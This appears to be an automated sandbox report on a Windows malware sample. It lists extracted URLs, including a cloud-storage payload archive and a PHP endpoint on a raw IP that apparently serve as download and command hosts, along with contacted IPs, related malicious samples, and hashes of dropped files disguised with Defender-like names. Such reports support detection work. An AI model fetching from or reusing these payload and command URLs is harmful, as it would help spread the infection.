Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/myuser/myrepo	Update.exe	false		high
http://defaultcontainer/tempfiles/sample.bsdiff	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.apache.org/licenses/LICENSE-2.0	ThirdPartyNotices.txt.7.dr	false		high
http://defaultcontainer/ContentPack.nuspec	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/lib/net48/vcruntime140.dll	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.delphiforfun.org/openU	BumpFiles.exe, 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, BumpFiles.exe, 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, MpSvc.dll.3.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	MpCommu.dll.7.dr	false		high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipSSC:	BumpFiles.exe, 00000007.00000003.1448555352.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://defaultcontainer/tempfiles/sample.diff	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/tempfiles/sample.nuspec	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://awsserver903203232.s3.sa-east-1.amazonaws.com/	BumpFiles.exe, 00000007.00000003.1448611101.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448611101.0000000002F15000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448804522.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.github.com/#	Update.exe	false		high
http://defaultcontainer/tempfiles/sample.exe	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.delphiforfun.org/	BumpFiles.exe, MpCmdRun.dll.7.dr	false		high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/h	BumpFiles.exe, 00000007.00000003.1448611101.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448804522.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Microsoft/cpprestsdk.	ThirdPartyNotices.txt.7.dr	false		high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip#	BumpFiles.exe, 00000007.00000003.1448611101.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://defaultcontainer/_rels/.rels	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/package/services/metadata/core-properties/63bdd4d7088c4a4c9e28aeaec7dfa81d.p	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/tempfiles/sample.dll	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/tempfiles/sample.rels	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipm	BumpFiles.exe, 00000007.00000003.1448611101.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448804522.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipu1poC:	BumpFiles.exe, 00000007.00000003.1448804522.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://20.201.117.220/sab3/HMlmsowpmT.php?a=	MpCmdRun.dll.7.dr	false	Avira URL Cloud: safe	unknown
https://github.com/Microsoft/cpprestsdk/blob/master/license.txt)	ThirdPartyNotices.txt.7.dr	false		high
http://defaultcontainer/lib/net48/BumpFiles_ExecutionStub.exe	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/tempfiles/sample.shasum	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipg	BumpFiles.exe, 00000007.00000003.1448611101.0000000002F15000.00000004.00000020.00020000.00000000.sdmp	false		high
http://defaultcontainer/lib/net48/BumpFiles.exe	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	MpCommu.dll.7.dr	false		high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip.	BumpFiles.exe, 00000007.00000002.2609950296.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.openxmlformats.or	Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://defaultcontainer/tempfiles/sample.psmdcp	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip;	BumpFiles.exe, 00000007.00000002.2609950296.0000000002EE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://defaultcontainer/lib/net48/MpSvc.dll	Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest	MpCommu.dll.7.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
3.5.234.1	s3-r-w.sa-east-1.amazonaws.com	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1397701
Start date and time:	2024-02-23 15:33:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0219830219301290321012notas.exe
Detection:	MAL
Classification:	mal72.rans.troj.evad.winEXE@15/77@1/1
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Update.exe, PID 7188 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:34:05	API Interceptor	1x Sleep call for process: BumpFiles.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-r-w.sa-east-1.amazonaws.com	0923840932020004-3-0.exe	Get hash	malicious	Unknown	Browse	3.5.232.185
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse	52.95.163.114
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse	16.12.0.34
	DOC7186723912#U0370.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.60
	DOC0974045396#U0370.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.98
	file.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.11
	F#U00b498074756.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.122
	https://dismelo.com.br	Get hash	malicious	Unknown	Browse	16.12.0.2
	nQ6U1S5Anw.exe	Get hash	malicious	Unknown	Browse	16.12.2.46
	S-432.exe	Get hash	malicious	Unknown	Browse	52.95.164.7

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe	Get hash	malicious	AgentTesla	Browse	13.234.24.116
	https://www.smore.com/3gtzh	Get hash	malicious	Unknown	Browse	13.225.63.24
	SecuriteInfo.com.Linux.Siggen.9999.30896.24770.elf	Get hash	malicious	Unknown	Browse	34.254.182.186
	arm7-20240223-1216.elf	Get hash	malicious	Mirai, Moobot	Browse	157.175.218.236
	SecuriteInfo.com.Heur.30198.9129.msi	Get hash	malicious	Unknown	Browse	13.225.210.4
	https://qrco.de/beoXnp	Get hash	malicious	HTMLPhisher	Browse	18.238.49.52
	https://o365aqzkadahajmsditmwjlo-987555.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	13.225.214.66
	343fV6LrhB.elf	Get hash	malicious	Moobot	Browse	34.249.145.219
	qRmUFzxtmx.elf	Get hash	malicious	Moobot	Browse	52.53.164.17
	GpqAAlRMz4.elf	Get hash	malicious	Moobot	Browse	34.219.214.189

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	3.5.234.1
	7VAFdANAsr.exe	Get hash	malicious	Unknown	Browse	3.5.234.1
	7VAFdANAsr.exe	Get hash	malicious	Unknown	Browse	3.5.234.1
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	3.5.234.1
	SecuriteInfo.com.Trojan-Banker.Win64.IcedID.er.29654.2537.msi	Get hash	malicious	Unknown	Browse	3.5.234.1
	SecuriteInfo.com.Win32.Trojan.PSE.11SCEUB.7077.7785.exe	Get hash	malicious	Unknown	Browse	3.5.234.1
	aol.com).eml	Get hash	malicious	Unknown	Browse	3.5.234.1
	4ZfJQ4Jtvf.exe	Get hash	malicious	Stealc, Vidar	Browse	3.5.234.1
	on.js	Get hash	malicious	Unknown	Browse	3.5.234.1
	on.js	Get hash	malicious	Unknown	Browse	3.5.234.1

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll	0923840932020004-3-0.exe	Get hash	malicious	Unknown	Browse
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe	0923840932020004-3-0.exe	Get hash	malicious	Unknown	Browse
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll	0923840932020004-3-0.exe	Get hash	malicious	Unknown	Browse
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	214352
Entropy (8bit):	6.043733758501481
Encrypted:	false
SSDEEP:	3072:wC3HjG5Tg1HlnGEx6s8Pt0TOAsdPgrjnKRKisSNm50i+B5KTedUQqm1FpCShisD:wC3OTg1AExYWCA4PeTKRKiRc5MT1vh
MD5:	573FA5E140E6B7C6209B546511DD0989
SHA1:	28BEFE7EF26AE909FEB74AC4A8C9981BED192A93
SHA-256:	BA543F2CF16CB1D1CFA87D7531E6045581EE76274C36D0C9DF8C131E05B86977
SHA-512:	6E43E60743207E0C50B42BAAAF0DE71F544B579292F7907360BE0926C56C74D06CAA4E7BC0ABF5AA857400D8A573BF820905F0B9283C26EE5CD2E0E3320736BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 0923840932020004-3-0.exe, Detection: malicious, Browse Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... )L.dH".dH".dH"./0!.`H"./0&.pH".dH#..I"./0#.EH"./0'.nH"./0".eH"./0*.=H"./0..eH"./0 .eH".RichdH".........PE..d...u.W.........." ......... ...............................................0......9.....`A...................................................@...............x.... ..P%... ..4....Y..p....................'..(....%..@...........8'...............................text...y........................... ..`.rdata..............................@..@.data...............................@....pdata..x........ ..................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\AmMonitoringInstall.mof

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	C source, ASCII text, with very long lines (769), with CRLF line terminators
Category:	modified
Size (bytes):	9398
Entropy (8bit):	4.899071819784544
Encrypted:	false
SSDEEP:	192:0kJH/0e6Y/WnPqLO0OKcie0lmkLgJsJ+LjtU+J3I:FBf6Yyf09MnkEeAu
MD5:	1FC6F870588FEF1B38BA900026BE8828
SHA1:	6075BC55198D9A0D75A4D7DB20B7B2D8AD47A466
SHA-256:	A24DD47738189CA55A5137A49FD1246418BC1C589A4294B79DFCC4D2A79C9098
SHA-512:	530A02081ECFBAB6AB59C904874C604263975174626980BFE445371540E999754A2DD204A003D79C8F7E5FF1D5C420E2CB93BF36B527DFBF774638FE923B62D8
Malicious:	false
Reputation:	low
Preview:	// AmMonitoringInstall.mof : mof source for Malware class..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// register the provider with the WMI repository...//....#pragma autorecover....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....////////////////////////////////////////////////////////..// Declare WMI class : Malware..////////////////////////////////////////////////////////....[.. Description("Describes malware detected by Forefront Antimalware"): ToInstance ToSubClass, .. dynamic: DisableOverride ToInstance,.. provider("AntimalwareMonitoringProvider"): ToInstance ToSubClass..]..class Malware: SerializableToXml..{.. string SchemaVersion = "1.0.0.0"; // derived from SerializableToXml.. .. [.. Description("Detection time in the Round-Trip Format"): ToInstance ToSubClass, .. read: ToInstance ToSubClass.. ].. string DetectionTime;.. .. [.. Desc

C:\Program Files (x86)\Microsoft.NET\AmStatusInstall.mof

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	C source, ASCII text, with very long lines (769), with CRLF line terminators
Category:	dropped
Size (bytes):	21004
Entropy (8bit):	4.9286194529785705
Encrypted:	false
SSDEEP:	192:HMVlF4ajQGgTGB6r+WApyLaNFeRUTqp1CljVU2kplI5NLO060YeVwa6wplCSJddn:YD4cQGgyBV7clIi0JFMSvG4k+
MD5:	EAA6FC46125F59D04BCBB6122817B41E
SHA1:	72436F84D76486D2D1F824E6BC0D3BD47D1CB2E7
SHA-256:	67191020D74AE8400F875238E494AAF5D28EEFEC7EFE1D1D20D2DB068D5E35D6
SHA-512:	77F7DE790509CEE5D288CE9DAFB3D100E9DB8F343D5D8380E1B0EDC441D3CC0666C8ECF30DE7910FA701A54C62897ACC169F46885AEEC02B78FC1BA91FE07A80
Malicious:	false
Preview:	// AmStatusInstall.mof : mof source for Antimalware Status provider..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// register the provider with the WMI repository..//....#pragma autorecover....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....////////////////////////////////////////////////////////..// Declare class : AntimalwareHealthStatus..////////////////////////////////////////////////////////..[.. provider("AntimalwareHealthStatusProv"): ToInstance ToSubClass, .. singleton: DisableOverride ToInstance ToSubClass, .. dynamic: DisableOverride ToInstance, .. Description("This is a singleton that represents the Microsoft Antimalware service status"): ToInstance ToSubClass..]..class AntimalwareHealthStatus: ProtectionTechnologyStatus..{.. string SchemaVersion = "1.0.0.1"; // derived from SerializableToXml.... string Name = "Antimalware"; // derived from ProtectionTechnologySta

C:\Program Files (x86)\Microsoft.NET\ClientWMIInstall.mof

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	C source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2460
Entropy (8bit):	4.767342366558364
Encrypted:	false
SSDEEP:	48:FiDRPfReZei3Q9Cf9haZCX0doQkAvVTIUH9:8Db2V3Q9CFhaZCX0doXAvVTIUH9
MD5:	6FE3967E8035358D369C83FA72400006
SHA1:	A2F9F0D1667431185B3E4E74ED47EDB9CF76A2F9
SHA-256:	29EFFB537FBC7C0CF869E61BFA5262CF7A7301604298E44373A637585C3504C7
SHA-512:	0C31F1A0E111A918C763AB30EA9BF2E889BEFDE1A63AA8511F5DC11D7D3C48AA1B25F27513881E32C4E22598BA648958D67B10B7221CAF863DEFD17657A28A02
Malicious:	false
Preview:	// ClientWMIUninstall.mof : ..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// install Microsoft Security Client classes to the WMI repository..//....#pragma autorecover....#pragma namespace("\\\\.\\root\\Microsoft")....instance of __Namespace..{.. Name = "SecurityClient" ;..};....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....class Win32_ProviderEx : __Win32Provider..{.. [.. Description("Hosting Model, provides compatibility with Windows XP and Windows Server .NET. Do not override."),.. Override("HostingModel").. ].. string HostingModel = "LocalServiceHost";.. .. [.. Description("..."),.. Override("SecurityDescriptor").. ] .. string SecurityDescriptor; .. .. UInt32 version = 1;..};......[.. abstract: ToInstance, .. Description("This is a base abstract class that might be serialized to XML"): ToInstance ToSubClass..]..class Seria

C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	296280
Entropy (8bit):	6.091659225748971
Encrypted:	false
SSDEEP:	6144:0WEUBaI5gV/c/JjDX8lv/FJlo3zMfPoL4qpBW/7DZe/pS:1VoVkhjDXS/rK4qpAFe0
MD5:	828221391F701B2CD7D1BF772A5B369E
SHA1:	E3C6679E9AA43B0A92841E36B4B2352599AA3437
SHA-256:	545F9356969C1D50E6FA0DEF359900F84553A7FDA29EDC55693CDE8B399E52BB
SHA-512:	988F7FA7A802A97C63D4AFA0D71434666179A7B73EA778332F4A77201551129F23B3C214526FA296C8B6BD688325044AFC734929E1AA94E4E58C79976F7FB14F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 0923840932020004-3-0.exe, Detection: malicious, Browse Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G..@...@...@.......@...C...@...D...@...E...@...A...@...A.E.@...H...@.......@...B...@.Rich..@.........................PE..d.....)..........."............................@.............................`......%-....`.......... ..........................................0.... ...#......X)...`..X%...P..\.......T.......................(...P...@............................................text............................... ..`.rdata..\|...........................@..@.data...@?.......@..................@....pdata..X).......0..................@..@.rsrc....#... ...0... ..............@..@.reloc..\....P.......P..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	328976
Entropy (8bit):	6.198120164117354
Encrypted:	false
SSDEEP:	6144:xNnWg5R+apw+X7RUi7ugdjklyi7mjSaO8xm6j2n:rWg5R+apw+X7iSJdjklyi7mjSt8Vjm
MD5:	86C84739AE8836EDADC2631B7D59F29B
SHA1:	0370932E18368A169C1A84A3F86A305016BA6AF0
SHA-256:	7AF5A25F7991926C507FA1DDC56639E0242FCB4CBD1E4667EE660E52FE824BA6
SHA-512:	ABC7E228A1A2C2C48025F40544CF4C79FB044864DB760146886A08234F3212FFE14B7E3E3B5094FC1036444C5E9D5C3C4F28DA1B7D80822A1931BC65ED221773
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 0923840932020004-3-0.exe, Detection: malicious, Browse Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2&..SH..SH..SH.g&I..SH.g&K..SH..+...SH.;!I..SH..SI.dRH.;!L..SH.;!K..SH.;!M.&SH.g&H..SH.g&A.SH.g&...SH.g&J..SH.Rich.SH.................PE..d......i.........." .....P...........................................................0....`A........................................`^..p....^..................8(.......%..............p......................(.......8............................................text....H.......P.................. ..`.rdata..R....`.......`..............@..@.data....0...p... ...p..............@....pdata..8(.......0..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\EppManifest.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1070440
Entropy (8bit):	5.101220702530903
Encrypted:	false
SSDEEP:	6144:JmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJZ:L/6qa37LS
MD5:	DD23543F34BBF0FB213A9B94EEAD88C6
SHA1:	0D86ACF88053E92C148246DBEC2ED57C5873D103
SHA-256:	11E886100FCCE403D98866CDF32A9DE5FE010DFC092B17B0A05D2598C6822CF8
SHA-512:	D87B4D7F309F2B0F6FE16803B32BCD6FD053482C705194AB0A93AB341232052AE35DEA60B34166ADB3E81F7E11685FA890AF3F8EB14C14D5159E2C30DD017E0B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d.....E.........." ......... ...............................................0......*.....`.......................................................... ...............0..h%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\FepUnregister.mof

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	C source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	361
Entropy (8bit):	4.8940836129092675
Encrypted:	false
SSDEEP:	6:j2Lx3wlgQ/B93BXVN+RytwqjOq5ceB0FVAnorAIeRKpLasaT2E/xoOEkyoMy:j2Lx3wlzBJBFN+RZqjOq5XB0GBb9RHxn
MD5:	CCE6F066104177A368EE528EBF94A170
SHA1:	25D90A5CC14763FC932A819A1120931C146E0F11
SHA-256:	58996425ADD2DFC63157CBD618ABB81C722FADCF5E2133D2488DB2840DBF47D5
SHA-512:	1E3314C5B974D97821AD5CBBC6B2D1529B598D9AD34F10AE61FEAA66625DE6ABC2267E579C59F5B1331A387EE036539C99B7256EF3A24964F5CE748D2C4D98A0
Malicious:	false
Preview:	// FepUnregister.mof : mof source for namespace unregisteration..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// unregister the provider with the WMI repository..//....#pragma namespace("\\\\.\\root\\Microsoft")..#pragma deleteinstance("__Namespace.Name='SecurityClient'", nofail)..

C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	210272
Entropy (8bit):	5.230229920969571
Encrypted:	false
SSDEEP:	6144:HmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJQ:FOd
MD5:	566A2EA0F4DE26A845FCB86E2E1FBBDC
SHA1:	7F09E0AE96C7B6FA922EB44957AFEA88A061C765
SHA-256:	424AABA98E59CD79F308FAC5D598D165B54006A75B24ECFA0D764B825CFC3565
SHA-512:	06B480F472F933DA67FBC92F845DF4E2070D57033D4052FD4277606550D2FB1782D35784419624CCF3EE2EE69586B5C8FFA535A35DF1057C377D6FD813DFCE15
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d...T............." .................................................................h....`.......................................................... ..................`%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1418512
Entropy (8bit):	6.2264061869732945
Encrypted:	false
SSDEEP:	24576:8oTyorjq8Iyuxo1Ejy4xdUzhuVStq5QYOPO0Yee55eOh1yLtVcVceu5r:8oTyore8Iy4AEjy4xdUzySC5OPOFee56
MD5:	D6D75D933B8FADA9C4016428EE8266F7
SHA1:	2E69B04D7320C590C7E4F8810F5CE5F51A7C3E2F
SHA-256:	7E2D151DB066EDFD958472D5F9B13113BEE2759306A568CA42A1FF0A3E3F4911
